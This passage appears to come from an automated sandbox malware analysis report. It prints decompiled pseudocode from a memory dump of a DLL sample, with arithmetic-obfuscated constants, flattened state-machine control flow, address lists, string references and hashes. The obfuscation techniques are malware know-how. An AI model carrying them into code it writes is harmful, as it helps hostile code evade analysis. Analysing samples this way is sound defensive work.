				_t453[0xc] = 0xdcf188;
				_pop(_t440);
				_t453[0x2b] = _t453[0x2b] & 0x00000000;
				_t453[0xc] = _t453[0xc] * 0x48;
				_t453[0xc] = _t453[0xc] + 0xb8d0;
				_t453[0xc] = _t453[0xc] + 0xe79e;
				_t453[0xc] = _t453[0xc] ^ 0x3e220605;
				_t453[0x1f] = 0x3f10b8;
				_t453[0x1f] = _t453[0x1f] | 0x536a71f8;
				_t453[0x1f] = _t453[0x1f] ^ 0x537d907f;
				_t453[0x17] = 0xda4ece;
				_t453[0x17] = _t453[0x17] / _t440;
				_t453[0x17] = _t453[0x17] + 0xffff6c3f;
				_t453[0x17] = _t453[0x17] ^ 0x000916d6;
				_t453[0x21] = 0x81e16;
				_t441 = 0x1f;
				_t453[0x20] = _t453[0x21] * 0x37;
				_t453[0x20] = _t453[0x20] ^ 0x01bbd9e8;
				_t453[0x12] = 0x23ff7a;
				_t453[0x12] = _t453[0x12] + 0xda88;
				_t453[0x12] = _t453[0x12] << 9;
				_t453[0x12] = _t453[0x12] ^ 0x49b967a0;
				_t453[0x25] = 0xa4ae1d;
				_t453[0x25] = _t453[0x25] + 0xffff1e93;
				_t453[0x25] = _t453[0x25] ^ 0x00a3b794;
				_t453[0x1a] = 0xc58380;
				_t453[0x1a] = _t453[0x1a] + 0xffff63f4;
				_t453[0x1a] = _t453[0x1a] ^ 0x00c360dd;
				_t453[0xa] = 0x315c71;
				_t453[0xa] = _t453[0xa] * 0x2d;
				_t453[0xa] = _t453[0xa] << 4;
				_t453[0xa] = _t453[0xa] >> 9;
				_t453[0xa] = _t453[0xa] ^ 0x004c0641;
				_t453[0x26] = 0xfaa693;
				_t453[0x26] = _t453[0x26] / _t441;
				_t453[0x26] = _t453[0x26] ^ 0x0006da62;
				_t453[6] = 0x2e22d8;
				_t453[6] = _t453[6] + 0x1da5;
				_t453[6] = _t453[6] ^ 0x7a3436a8;
				_t453[6] = _t453[6] + 0x3380;
				_t453[6] = _t453[6] ^ 0x7a1ea83a;
				_t453[0xe] = 0x225cf9;
				_t442 = 0x46;
				_t453[0xf] = _t453[0xe] * 0xd;
				_t453[0xf] = _t453[0xf] / _t442;
				_t453[0xf] = _t453[0xf] ^ 0x000c9e58;
				_t453[0x1e] = 0xb4cd70;
				_t443 = 5;
				_t453[0x1e] = _t453[0x1e] / _t443;
				_t453[0x1e] = _t453[0x1e] ^ 0x00223e8b;
				_t453[0x25] = 0x175145;
				_t453[0x25] = _t453[0x25] + 0xffffbe60;
				_t453[0x25] = _t453[0x25] ^ 0x0015ea4b;
				_t453[0x16] = 0x9a90a6;
				_t453[0x16] = _t453[0x16] >> 1;
				_t453[0x16] = _t453[0x16] | 0x97e6917e;
				_t453[0x16] = _t453[0x16] ^ 0x97edbee9;
				_t453[0x14] = 0x10553c;
				_t453[0x14] = _t453[0x14] | 0x69ed7b68;
				_t453[0x14] = _t453[0x14] ^ 0x8ccf5101;
				_t453[0x14] = _t453[0x14] ^ 0xe532736d;
				_t453[0x12] = 0x5e103c;
				_t453[0x12] = _t453[0x12] ^ 0xd5bdf2ed;
				_t453[0x12] = _t453[0x12] | 0x536bb37e;
				_t453[0x12] = _t453[0x12] ^ 0xd7e39e3a;
				_t453[6] = 0xad714c;
				_t453[6] = _t453[6] << 5;
				_t444 = 0x5a;
				_t453[6] = _t453[6] * 0x77;
				_t453[6] = _t453[6] | 0x8fd7f967;
				_t453[6] = _t453[6] ^ 0x9ffa7b5b;
				_t453[0x29] = 0x969a62;
				_t453[0x29] = _t453[0x29] + 0xffff3747;
				_t453[0x29] = _t453[0x29] ^ 0x009bad24;
				_t453[0x22] = 0xa29aa2;
				_t453[0x22] = _t453[0x22] + 0xffff9bca;
				_t453[0x22] = _t453[0x22] ^ 0x00a8d7f4;
				_t453[0x28] = 0x5c718d;
				_t453[0x28] = _t453[0x28] / _t444;
				_t453[0x28] = _t453[0x28] ^ 0x000e04a7;
				_t453[0x15] = 0x6aed70;
				_t453[0x15] = _t453[0x15] | 0x24270adc;
				_t453[0x15] = _t453[0x15] ^ 0x00a30154;
				_t453[0x15] = _t453[0x15] ^ 0x24c5236d;
				_t453[0x20] = 0x9ad963;
				_t453[0x20] = _t453[0x20] ^ 0x804e7f4a;
				_t453[0x20] = _t453[0x20] ^ 0x80d9ea50;
				_t453[0x1c] = 0xc68496;
				_t453[0x1c] = _t453[0x1c] >> 0x10;
				_t453[0x1c] = _t453[0x1c] ^ 0x0003f168;
				_t453[0x24] = 0x7e4214;
				_t453[0x24] = _t453[0x24] << 4;
				_t453[0x24] = _t453[0x24] ^ 0x07e08805;
				_t453[0x11] = 0x92d404;
				_t445 = 0x3c;
				_t453[0x10] = _t453[0x11] / _t445;
				_t453[0x10] = _t453[0x10] + 0x2a76;
				_t453[0x10] = _t453[0x10] ^ 0x0004ebe7;
				_t453[9] = 0xe8ea05;
				_t453[9] = _t453[9] + 0xffffd5a4;
				_t453[9] = _t453[9] << 7;
				_t453[9] = _t453[9] + 0xffff1c2a;
				_t453[9] = _t453[9] ^ 0x7454948f;
				_t453[7] = 0x853308;
				_t453[7] = _t453[7] + 0xffff5128;
				_t453[7] = _t453[7] + 0x9f37;
				_t453[7] = _t453[7] | 0x54c51839;
				_t453[7] = _t453[7] ^ 0x54ca1cec;
				_t453[0x1c] = 0x270edd;
				_t453[0x1c] = _t453[0x1c] + 0x9c5c;
				_t453[0x1c] = _t453[0x1c] ^ 0x00251ad9;
				_t453[0x22] = 0x4b1e01;
				_t453[0x22] = _t453[0x22] >> 0xa;
				_t453[0x22] = _t453[0x22] ^ 0x00014be5;
				_t453[0xf] = 0x1097d4;
				_t453[0xf] = _t453[0xf] ^ 0x70356bb9;
				_t453[0xf] = _t453[0xf] << 7;
				_t453[0xf] = _t453[0xf] ^ 0x12f26116;
				_t453[0xd] = 0x3e61;
				_t453[0xd] = _t453[0xd] ^ 0x4940d563;
				_t453[0xd] = _t453[0xd] << 5;
				_t453[0xd] = _t453[0xd] ^ 0x28127601;
				_t453[0x19] = 0xea3040;
				_t265 =  &(_t453[0x19]); // 0xea3040
				_t446 = 0x24;
				_t390 = _t453[0x2a];
				_t453[0x1a] =  *_t265 * 0x3e;
				_t435 = _t453[0x2a];
				_t453[0x1a] = _t453[0x1a] / _t446;
				_t453[0x1a] = _t453[0x1a] ^ 0x01901c81;
				_t453[0xd] = 0xdd1c82;
				_t447 = 0x39;
				_t451 = _t453[0x29];
				_t453[0xc] = _t453[0xd] * 0x64;
				_t453[0xc] = _t453[0xc] / _t447;
				_t453[0xc] = _t453[0xc] ^ 0x01838ff7;
				L1:
				while(1) {
					while(_t392 != 0x17dddcb) {
						if(_t392 == 0x8a29766) {
							E00D52B09(_t453[0x24], _t435, _t453[0x10], _t453[0xd]);
							_t392 = 0xcdeb26f;
							continue;
						} else {
							if(_t392 == 0xac116a6) {
								E00D50DB1(_t453[0x1b],  &(_t453[0x2d]), __eflags, _t453[0xd], _t392, _t453[0x1e]);
								_t373 = E00D409DD(_t453[0x1b],  &(_t453[0x30]), _t453[0x24], _t453[0x15]);
								_t451 = _t373;
								_t453 =  &(_t453[5]);
								_t392 = 0xf1147e4;
								 *((short*)(_t373 - 2)) = 0;
								continue;
							} else {
								if(_t392 == 0xcdeb26f) {
									_t337 =  &(_t453[0x19]); // 0xea3040
									E00D51538( *_t337, _t453[0xc], _t390);
								} else {
									if(_t392 == 0xe12044f) {
										_t392 = 0xac116a6;
										continue;
									} else {
										if(_t392 == 0xe899f05) {
											_t378 = E00D4E406(_t453[0x11], _t453[0x33], _t392, _t453[0x2b], _t453[0x30], _t435, _t453[0xb], _t392,  &(_t453[0x2e]), _t453[0x2d], _t453[0x17], _t453[0x21], _t392, _t390);
											_t453 =  &(_t453[0xc]);
											__eflags = _t378;
											if(_t378 == 0) {
												L17:
												_t379 = _t453[0x2a];
											} else {
												_t449 = _t435;
												while(1) {
													__eflags =  *((intOrPtr*)(_t449 + 4)) - 4;
													if( *((intOrPtr*)(_t449 + 4)) != 4) {
														goto L14;
													}
													L13:
													_t387 = E00D5061D(_t453[0x1d], _t451, _t449 + 0xc, _t453[0x24], _t453[0x10]);
													_t453 =  &(_t453[3]);
													__eflags = _t387;
													if(_t387 == 0) {
														_t379 = 1;
														_t453[0x2a] = 1;
													} else {
														goto L14;
													}
													goto L18;
													L14:
													_t385 =  *_t449;
													__eflags = _t385;
													if(_t385 == 0) {
														goto L17;
													} else {
														_t449 = _t449 + _t385;
														__eflags =  *((intOrPtr*)(_t449 + 4)) - 4;
														if( *((intOrPtr*)(_t449 + 4)) != 4) {
															goto L14;
														}
													}
													goto L18;
												}
											}
											L18:
											__eflags = _t379;
											if(__eflags == 0) {
												L20:
												_t392 = 0xe899f05;
											} else {
												_t383 =  *0xd56208; // 0x0
												E00D527BC(_t453[0xa], _t453[8],  *((intOrPtr*)(_t383 + 0x18)), _t453[0x1c]);
												_t392 = 0x8a29766;
											}
											continue;
											L30:
										} else {
											if(_t392 != 0xf1147e4) {
												L26:
												__eflags = _t392 - 0x2906cf2;
												if(__eflags != 0) {
													continue;
												} else {
												}
											} else {
												_t382 = E00D545CA( &(_t453[0x38]), _t453[0x2f], _t392, _t392, _t453[0x23], _t453[0x12], _t453[0x2d], 1, _t453[0xb], _t453[0x12], 0x2000000, _t453[0x1f], _t453[0x18], _t453[8] | 0x00000006);
												_t390 = _t382;
												_t453 =  &(_t453[0xc]);
												if(_t382 != 0xffffffff) {
													_t392 = 0x17dddcb;
													continue;
												}
											}
										}
									}
								}
							}
						}
						L29:
						__eflags = 0;
						return 0;
						goto L30;
					}
					_push(_t392);
					_push(_t392);
					_t453[0x2c] = 0x1000;
					_t435 = E00D3C5D8(0x1000);
					_t453 =  &(_t453[3]);
					__eflags = _t435;
					if(__eflags != 0) {
						goto L20;
					} else {
						_t392 = 0xcdeb26f;
						goto L26;
					}
					goto L29;
				}
			}

0x00d536b0
0x00d536bd
0x00d536c6
0x00d536d0
0x00d536d5
0x00d536db
0x00d536e0
0x00d536e8
0x00d536f0
0x00d536f8
0x00d53700
0x00d53705
0x00d5370d
0x00d53715
0x00d5371a
0x00d53722
0x00d5372a
0x00d53736
0x00d53739
0x00d5373b
0x00d53741
0x00d53749
0x00d53751
0x00d5375e
0x00d53761
0x00d53769
0x00d5376d
0x00d53775
0x00d5377d
0x00d53785
0x00d5378d
0x00d53795
0x00d5379d
0x00d537ad
0x00d537b1
0x00d537b9
0x00d537c1
0x00d537d4
0x00d537d5
0x00d537dc
0x00d537e7
0x00d537ef
0x00d537f7
0x00d537fc
0x00d53804
0x00d5380f
0x00d5381a
0x00d53825
0x00d5382d
0x00d53835
0x00d5383d
0x00d5384a
0x00d5384e
0x00d53853
0x00d53858
0x00d53860
0x00d53874
0x00d5387b
0x00d53886
0x00d53890
0x00d53898
0x00d538a0
0x00d538a8
0x00d538b0
0x00d538bf
0x00d538c2
0x00d538ce
0x00d538d2
0x00d538da
0x00d538e6
0x00d538eb
0x00d538f1
0x00d538f9
0x00d53904
0x00d5390f
0x00d5391a
0x00d53922
0x00d53926
0x00d5392e
0x00d53936
0x00d5393e
0x00d53946
0x00d5394e
0x00d53956
0x00d5395e
0x00d53966
0x00d5396e
0x00d53976
0x00d5397e
0x00d53988
0x00d5398b
0x00d5398f
0x00d53997
0x00d5399f
0x00d539aa
0x00d539b5
0x00d539c0
0x00d539cb
0x00d539d6
0x00d539e1
0x00d539f7
0x00d539fe
0x00d53a09
0x00d53a11
0x00d53a19
0x00d53a21
0x00d53a29
0x00d53a34
0x00d53a3f
0x00d53a4a
0x00d53a52
0x00d53a57
0x00d53a5f
0x00d53a6a
0x00d53a72
0x00d53a7d
0x00d53a89
0x00d53a8c
0x00d53a90
0x00d53a98
0x00d53aa0
0x00d53aa8
0x00d53ab2
0x00d53ab7
0x00d53abf
0x00d53ac7
0x00d53acf
0x00d53ad7
0x00d53adf
0x00d53ae7
0x00d53aef
0x00d53af7
0x00d53aff
0x00d53b07
0x00d53b12
0x00d53b1a
0x00d53b25
0x00d53b2d
0x00d53b35
0x00d53b3a
0x00d53b42
0x00d53b4a
0x00d53b52
0x00d53b57
0x00d53b5f
0x00d53b67
0x00d53b6e
0x00d53b71
0x00d53b78
0x00d53b84
0x00d53b8b
0x00d53b8f
0x00d53b97
0x00d53ba4
0x00d53ba5
0x00d53bac
0x00d53bb6
0x00d53bba
0x00000000
0x00d53bc2
0x00d53bc2
0x00d53bd4
0x00d53d95
0x00d53d9c
0x00000000
0x00d53bda
0x00d53be0
0x00d53d4f
0x00d53d6a
0x00d53d6f
0x00d53d71
0x00d53d76
0x00d53d7b
0x00000000
0x00d53be6
0x00d53bec
0x00d53df4
0x00d53df9
0x00d53bf2
0x00d53bf8
0x00d53d31
0x00000000
0x00d53bfe
0x00d53c04
0x00d53cac
0x00d53cb1
0x00d53cb4
0x00d53cb6
0x00d53cf7
0x00d53cf7
0x00d53cb8
0x00d53cb8
0x00d53cba
0x00d53cba
0x00d53cbe
0x00000000
0x00000000
0x00d53cc0
0x00d53cd5
0x00d53cda
0x00d53cdd
0x00d53cdf
0x00d53ced
0x00d53cee
0x00000000
0x00000000
0x00000000
0x00000000
0x00d53ce1
0x00d53ce1
0x00d53ce3
0x00d53ce5
0x00000000
0x00d53ce7
0x00d53ce7
0x00d53cba
0x00d53cbe
0x00000000
0x00000000
0x00d53cbe
0x00000000
0x00d53ce5
0x00d53cba
0x00d53cfe
0x00d53cfe
0x00d53d00
0x00d53d27
0x00d53d27
0x00d53d02
0x00d53d06
0x00d53d16
0x00d53d1d
0x00d53d1d
0x00000000
0x00000000
0x00d53c06
0x00d53c0c
0x00d53de2
0x00d53de2
0x00d53de8
0x00000000
0x00000000
0x00d53dee
0x00d53c12
0x00d53c53
0x00d53c58
0x00d53c5a
0x00d53c60
0x00d53c66
0x00000000
0x00d53c66
0x00d53c60
0x00d53c0c
0x00d53c04
0x00d53bf8
0x00d53bec
0x00d53be0
0x00d53dff
0x00d53e02
0x00d53e0b
0x00000000
0x00d53e0b
0x00d53db9
0x00d53dba
0x00d53dc0
0x00d53dd0
0x00d53dd2
0x00d53dd5
0x00d53dd7
0x00000000
0x00d53ddd
0x00d53ddd
0x00000000
0x00d53ddd
0x00000000
0x00d53dd7

Strings

{*, xrefs: 00D536E0
_sC, xrefs: 00D5370D
@0, xrefs: 00D53B67
v*, xrefs: 00D53A90
ms2, xrefs: 00D5394E
a>, xrefs: 00D53B42
pj, xrefs: 00D53A09
q\1, xrefs: 00D5383D

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: @0$_sC$a>$ms2$pj$q\1$v*${*
API String ID: 0-3081288078
Opcode ID: 4a517a7ce6a73ad0e2c9873d75831b769f7b101ab7d9390b5fc07cc3ed8ecf02
Instruction ID: 7bb492653bb08cddc08acd4d768d43a608f4a2a1204764e5ed99eca97b2a2846
Opcode Fuzzy Hash: 4a517a7ce6a73ad0e2c9873d75831b769f7b101ab7d9390b5fc07cc3ed8ecf02
Instruction Fuzzy Hash: 2D0240715083809FD7A8CF65C48AA5BBBF1FBC4758F10890DEADA86260D7B48948CB53

Uniqueness

Uniqueness Score: -1.00%

Function 00D546BD, Relevance: 10.3, Strings: 8, Instructions: 293
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E00D546BD(void* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				void* _t316;
				intOrPtr _t339;
				intOrPtr* _t341;
				void* _t343;
				intOrPtr* _t346;
				void* _t348;
				intOrPtr* _t349;
				void* _t351;
				intOrPtr _t367;
				signed int _t370;
				signed int _t371;
				signed int _t372;
				signed int _t373;
				void* _t375;
				void* _t376;

				_t369 = _a16;
				_t349 = __edx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00D4FE29(_t316);
				_v16 = 0xd9d351;
				_t367 = 0;
				_v12 = 0x17e122;
				_t376 = _t375 + 0x18;
				_v8 = 0;
				_v96 = 0xcc9d59;
				_t351 = 0xff449f4;
				_v96 = _v96 << 0xc;
				_v96 = _v96 + 0x162d;
				_v96 = _v96 ^ 0xc9d5a62c;
				_v132 = 0x3cc17f;
				_v132 = _v132 + 0xffff84d9;
				_t370 = 0x52;
				_v132 = _v132 * 0x3d;
				_v132 = _v132 << 0xf;
				_v132 = _v132 ^ 0x617c0001;
				_v48 = 0x63951b;
				_v48 = _v48 >> 7;
				_v48 = _v48 ^ 0x0000c72a;
				_v64 = 0xbc1395;
				_v64 = _v64 >> 0xd;
				_v64 = _v64 ^ 0x000005e0;
				_v80 = 0x50b5ee;
				_v80 = _v80 + 0xf34;
				_v80 = _v80 >> 1;
				_v80 = _v80 ^ 0x00286291;
				_v92 = 0x9715d8;
				_v92 = _v92 * 0x46;
				_v92 = _v92 << 0xd;
				_v92 = _v92 ^ 0xff220000;
				_v52 = 0xfde3f2;
				_v52 = _v52 + 0xa710;
				_v52 = _v52 ^ 0x00fe8b02;
				_v160 = 0x198337;
				_v160 = _v160 + 0xffff007e;
				_v160 = _v160 << 0x10;
				_v160 = _v160 ^ 0x69569842;
				_v160 = _v160 ^ 0xeaeb46e9;
				_v28 = 0xcc69bd;
				_v28 = _v28 ^ 0xeecfab9f;
				_v28 = _v28 ^ 0xee01123b;
				_v136 = 0x76b317;
				_v136 = _v136 / _t370;
				_v136 = _v136 + 0xffff81f3;
				_v136 = _v136 << 3;
				_v136 = _v136 ^ 0x00064d41;
				_v112 = 0x80a4bd;
				_v112 = _v112 * 0x13;
				_v112 = _v112 << 0xa;
				_v112 = _v112 + 0xcad4;
				_v112 = _v112 ^ 0x30efc400;
				_v144 = 0x82a288;
				_v144 = _v144 << 2;
				_v144 = _v144 >> 0xe;
				_v144 = _v144 << 9;
				_v144 = _v144 ^ 0x0011be13;
				_v56 = 0x7edd30;
				_v56 = _v56 * 0x55;
				_v56 = _v56 ^ 0x2a184bb4;
				_v88 = 0xe2a415;
				_t371 = 6;
				_v88 = _v88 * 0x2a;
				_v88 = _v88 + 0xffff5f32;
				_v88 = _v88 ^ 0x252ac732;
				_v128 = 0xe004bc;
				_v128 = _v128 ^ 0x574173bd;
				_v128 = _v128 >> 9;
				_v128 = _v128 ^ 0xd8221cc5;
				_v128 = _v128 ^ 0xd803a3d4;
				_v152 = 0x516ea5;
				_v152 = _v152 + 0xffff4486;
				_v152 = _v152 | 0x140257d0;
				_v152 = _v152 >> 0xf;
				_v152 = _v152 ^ 0x00051039;
				_v120 = 0x9f4975;
				_v120 = _v120 ^ 0x86b89632;
				_v120 = _v120 * 0x24;
				_v120 = _v120 | 0x1b5f0b87;
				_v120 = _v120 ^ 0xdfd1de63;
				_v36 = 0xa5f8e9;
				_v36 = _v36 + 0x714e;
				_v36 = _v36 ^ 0x00af22d8;
				_v44 = 0x824fdb;
				_v44 = _v44 + 0xffff91e5;
				_v44 = _v44 ^ 0x008fd473;
				_v68 = 0x680ab0;
				_v68 = _v68 + 0xbc39;
				_v68 = _v68 / _t371;
				_v68 = _v68 ^ 0x001a68c1;
				_v76 = 0x17a4af;
				_v76 = _v76 >> 0xb;
				_t372 = 0x5b;
				_v76 = _v76 / _t372;
				_v76 = _v76 ^ 0x0007f211;
				_v84 = 0x315e60;
				_v84 = _v84 + 0x702b;
				_v84 = _v84 + 0xffff10cc;
				_v84 = _v84 ^ 0x003e64ec;
				_v100 = 0x9cc34d;
				_v100 = _v100 | 0x947c2ff5;
				_t373 = 0x3a;
				_v100 = _v100 / _t373;
				_v100 = _v100 ^ 0x02979c4b;
				_v140 = 0xbfeff4;
				_v140 = _v140 ^ 0x822e0370;
				_v140 = _v140 + 0xf2f6;
				_v140 = _v140 | 0x96ab8507;
				_v140 = _v140 ^ 0x96bf89b8;
				_v60 = 0xfd95c4;
				_v60 = _v60 << 3;
				_v60 = _v60 ^ 0x07e16726;
				_v148 = 0x38036;
				_v148 = _v148 ^ 0x54103d5f;
				_v148 = _v148 | 0x54303272;
				_t206 =  &_v148; // 0x54303272
				_v148 =  *_t206;
				_v148 = _v148 ^ 0x5432cd2c;
				_v40 = 0xc550eb;
				_v40 = _v40 | 0x63f29c9e;
				_v40 = _v40 ^ 0x63f29262;
				_v32 = 0xf7791b;
				_v32 = _v32 * 0x51;
				_v32 = _v32 ^ 0x4e4d9c2b;
				_v156 = 0xdcae59;
				_v156 = _v156 + 0xffffc6cd;
				_v156 = _v156 + 0xfffffd52;
				_v156 = _v156 ^ 0x46382038;
				_v156 = _v156 ^ 0x46e78b29;
				_v72 = 0xac5d66;
				_v72 = _v72 | 0xb655dd15;
				_v72 = _v72 + 0xffff07b1;
				_v72 = _v72 ^ 0xb6f51c6c;
				_v104 = 0x2e3a8e;
				_v104 = _v104 | 0xfac334a1;
				_v104 = _v104 << 4;
				_v104 = _v104 ^ 0xaefe5277;
				_v108 = 0xcd35f0;
				_v108 = _v108 << 0xf;
				_v108 = _v108 | 0xf31160b4;
				_v108 = _v108 ^ 0xc3cc8d90;
				_v108 = _v108 ^ 0x3831362e;
				_v116 = 0x7e4b3f;
				_v116 = _v116 << 9;
				_v116 = _v116 + 0xa646;
				_v116 = _v116 + 0x5b3c;
				_v116 = _v116 ^ 0xfc982242;
				_v124 = 0x9fd9df;
				_v124 = _v124 >> 6;
				_v124 = _v124 << 0xf;
				_v124 = _v124 << 1;
				_v124 = _v124 ^ 0x7f607f7f;
				do {
					while(_t351 != 0x8274db) {
						if(_t351 == 0x30c1656) {
							_push(_t351);
							_push(_t351);
							_t339 = E00D3C5D8(_v20);
							_t376 = _t376 + 0xc;
							_v24 = _t339;
							if(_t339 != 0) {
								_t351 = 0x6ee5562;
								continue;
							}
						} else {
							if(_t351 == 0x6ee5562) {
								_t341 =  *0xd56224; // 0x0
								_t343 = E00D511B0(_v84, _t351, _v92, _v100, _v132, _v140, _v60, _v148, _v20,  *_t369, _v40,  *((intOrPtr*)(_t369 + 4)), _v32,  &_v20, _v156, _v72, _v24,  *_t341, _v104);
								_t376 = _t376 + 0x48;
								if(_t343 == _v52) {
									 *_t349 = _v24;
									_t367 = 1;
									 *((intOrPtr*)(_t349 + 4)) = _v20;
								} else {
									_t351 = 0x8274db;
									continue;
								}
							} else {
								if(_t351 == 0xc41b31c) {
									_t346 =  *0xd56224; // 0x0
									_t348 = E00D511B0(_v160, _t351, _v48, _v28, _v96, _v136, _v112, _v144, _v64,  *_t369, _v56,  *((intOrPtr*)(_t369 + 4)), _v88,  &_v20, _v128, _v152, _t367,  *_t346, _v120);
									_t376 = _t376 + 0x48;
									if(_t348 == _v80) {
										_t351 = 0x30c1656;
										continue;
									}
								} else {
									if(_t351 != 0xff449f4) {
										goto L14;
									} else {
										_t351 = 0xc41b31c;
										continue;
									}
								}
							}
						}
						L17:
						return _t367;
					}
					E00D52B09(_v108, _v24, _v116, _v124);
					_t351 = 0xc0b2195;
					L14:
				} while (_t351 != 0xc0b2195);
				goto L17;
			}

0x00d546c6
0x00d546cd
0x00d546d0
0x00d546d1
0x00d546d8
0x00d546df
0x00d546e6
0x00d546e7
0x00d546e8
0x00d546ed
0x00d546f8
0x00d546fa
0x00d54705
0x00d54708
0x00d54711
0x00d54719
0x00d5471e
0x00d54723
0x00d5472b
0x00d54733
0x00d5473b
0x00d5474a
0x00d5474b
0x00d5474f
0x00d54754
0x00d5475c
0x00d54767
0x00d5476f
0x00d5477a
0x00d54782
0x00d54787
0x00d5478f
0x00d54797
0x00d5479f
0x00d547a3
0x00d547ab
0x00d547b8
0x00d547bc
0x00d547c1
0x00d547c9
0x00d547d4
0x00d547df
0x00d547ea
0x00d547f2
0x00d547fa
0x00d547ff
0x00d54807
0x00d5480f
0x00d5481a
0x00d54825
0x00d54830
0x00d5483e
0x00d54842
0x00d5484a
0x00d5484f
0x00d54857
0x00d54864
0x00d54868
0x00d5486d
0x00d54875
0x00d5487d
0x00d54885
0x00d5488a
0x00d5488f
0x00d54894
0x00d5489c
0x00d548a9
0x00d548ad
0x00d548b5
0x00d548c6
0x00d548c9
0x00d548cd
0x00d548d5
0x00d548dd
0x00d548e5
0x00d548ed
0x00d548f2
0x00d548fa
0x00d54902
0x00d5490a
0x00d54912
0x00d5491a
0x00d5491f
0x00d54927
0x00d5492f
0x00d5493c
0x00d54940
0x00d54948
0x00d54950
0x00d5495b
0x00d54966
0x00d54971
0x00d5497c
0x00d54987
0x00d54992
0x00d5499a
0x00d549aa
0x00d549ae
0x00d549b6
0x00d549be
0x00d549c7
0x00d549cc
0x00d549d2
0x00d549da
0x00d549e2
0x00d549ea
0x00d549f2
0x00d549fa
0x00d54a02
0x00d54a0e
0x00d54a11
0x00d54a15
0x00d54a1d
0x00d54a25
0x00d54a2d
0x00d54a35
0x00d54a3d
0x00d54a45
0x00d54a4d
0x00d54a52
0x00d54a5a
0x00d54a62
0x00d54a6a
0x00d54a72
0x00d54a76
0x00d54a7a
0x00d54a82
0x00d54a8d
0x00d54a98
0x00d54aa3
0x00d54ab6
0x00d54abd
0x00d54ac8
0x00d54ad0
0x00d54ad8
0x00d54ae0
0x00d54aed
0x00d54af5
0x00d54afd
0x00d54b05
0x00d54b0d
0x00d54b15
0x00d54b1d
0x00d54b25
0x00d54b2a
0x00d54b32
0x00d54b3a
0x00d54b3f
0x00d54b47
0x00d54b4f
0x00d54b57
0x00d54b5f
0x00d54b64
0x00d54b6c
0x00d54b74
0x00d54b7c
0x00d54b84
0x00d54b89
0x00d54b8e
0x00d54b92
0x00d54b9a
0x00d54b9a
0x00d54ba8
0x00d54cdd
0x00d54cde
0x00d54ce6
0x00d54ceb
0x00d54cee
0x00d54cf7
0x00d54cf9
0x00000000
0x00d54cf9
0x00d54bae
0x00d54bb4
0x00d54c4e
0x00d54caf
0x00d54cb4
0x00d54cbe
0x00d54d39
0x00d54d3b
0x00d54d43
0x00d54cc0
0x00d54cc0
0x00000000
0x00d54cc0
0x00d54bba
0x00d54bc0
0x00d54bd9
0x00d54c2e
0x00d54c33
0x00d54c3a
0x00d54c40
0x00000000
0x00d54c40
0x00d54bc2
0x00d54bc8
0x00000000
0x00d54bce
0x00d54bce
0x00000000
0x00d54bce
0x00d54bc8
0x00d54bc0
0x00d54bb4
0x00d54d46
0x00d54d52
0x00d54d52
0x00d54d16
0x00d54d1d
0x00d54d22
0x00d54d22
0x00000000

Strings

?K~, xrefs: 00D54B57
Nq, xrefs: 00D5495B
r20T, xrefs: 00D54A72
<[, xrefs: 00D54B6C
d>, xrefs: 00D549F2
F, xrefs: 00D54807
8 8F, xrefs: 00D54AE0
.618, xrefs: 00D54B4F

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: .618$8 8F$<[$?K~$Nq$r20T$F$d>
API String ID: 0-914106314
Opcode ID: 7bd4cf2ee6aeb00388430dd19e8848353efed79b40950a19b905638b15549b95
Instruction ID: c03654994272524ef82d459a2d7fb488c8916ef5051ba4f024f735411a82d301
Opcode Fuzzy Hash: 7bd4cf2ee6aeb00388430dd19e8848353efed79b40950a19b905638b15549b95
Instruction Fuzzy Hash: BBF1EE71009380DFD769CF61C98AA5BBBF1FB85748F108A1DE6DA86260D7B58948CF13

Uniqueness

Uniqueness Score: -1.00%

Function 00D4017B, Relevance: 10.3, Strings: 8, Instructions: 263
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E00D4017B(void* __ecx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				intOrPtr _v60;
				char _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				char _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				char _t272;
				void* _t295;
				signed int _t305;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				void* _t312;
				void* _t334;
